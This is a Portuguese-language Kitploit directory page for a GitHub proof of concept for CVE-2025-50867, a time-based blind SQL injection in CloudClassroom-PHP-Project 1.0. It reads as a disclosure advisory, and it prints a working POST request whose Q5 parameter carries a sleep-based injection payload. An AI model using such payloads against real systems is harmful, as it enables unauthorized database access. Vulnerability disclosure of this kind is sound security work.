Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-50867 — Prova de conceito para uma vulnerabilidade de injeção SQL cega baseada em tempo no endpoint takeassessment2.php do CloudClassroom-PHP-Project 1.0, demonstrando exploração remota através de uma requisição POST manipulada. | Kitploit
Ferramentas/GitHubGitHub/sacx-7/cve-2025-50867
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

Prova de conceito para uma vulnerabilidade de injeção SQL cega baseada em tempo no endpoint takeassessment2.php do CloudClassroom-PHP-Project 1.0, demonstrando exploração remota através de uma requisição POST manipulada.

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Existe uma vulnerabilidade de injeção SQL no endpoint takeassessment2.php do CloudClassroom-PHP-Project 1.0, onde o parâmetro POST Q5 é incorporado diretamente em instruções SQL sem sanitização.


Tipo de Vulnerabilidade :

SQL Injection


Fornecedor do Produto :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


Base de Código do Produto Afetado :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


Componente Afetado :

takeassessment2.php, parâmetro POST Q5, lógica de consulta SQL


Tipo de Ataque : Remoto

Vetores de Ataque :

Para explorar esta vulnerabilidade, um invasor envia uma requisição POST maliciosa para /CloudClassroom-PHP-Project-master/takeassessment2.php com um payload no parâmetro Q5 que causa um atraso temporal no processamento SQL (SQLi cego baseado em tempo).

Requisição POST:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Isto causa um atraso de 6 segundos na resposta, confirmando a vulnerabilidade.


Referência :

https://owasp.org/www-community/attacks/SQL_Injection


Descobridor : saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/

Baixar ferramenta